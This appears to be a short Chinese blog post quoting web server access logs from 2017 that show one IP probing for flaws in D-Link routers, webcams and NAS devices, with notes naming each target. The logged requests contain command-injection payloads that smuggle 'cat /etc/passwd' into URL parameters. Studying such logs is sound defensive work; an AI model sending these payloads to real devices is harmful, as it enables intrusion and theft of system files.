從網站的Log檔其實可以學到不少漏洞的入侵方式
125.130.189.3 - - [10/Oct/2017:15:14:30 +0800] "POST /hedwig.cgi HTTP/1.1" 404 208
125.130.189.3 - - [10/Oct/2017:15:14:35 +0800] "GET /system.ini?loginuse&loginpas HTTP/1.1" 404 208
125.130.189.3 - - [10/Oct/2017:15:14:41 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:46 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:51 +0800] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 216
125.130.189.3 - - [10/Oct/2017:15:14:57 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:02 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:07 +0800] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 404 207
125.130.189.3 - - [10/Oct/2017:15:15:12 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203
125.130.189.3 - - [10/Oct/2017:15:15:18 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203
125.130.189.3 - - [10/Oct/2017:15:15:23 +0800] "GET /shell?cat%20/etc/passwd HTTP/1.1" 404 203
其中 hedwig.cgi 是某些 D-Link 分享器的漏洞
system.ini?loginuse&loginpas 可能為網路攝影機的漏洞
upgrade_handle.php 可能為某NAS漏洞
:
:
:
沒有留言:
張貼留言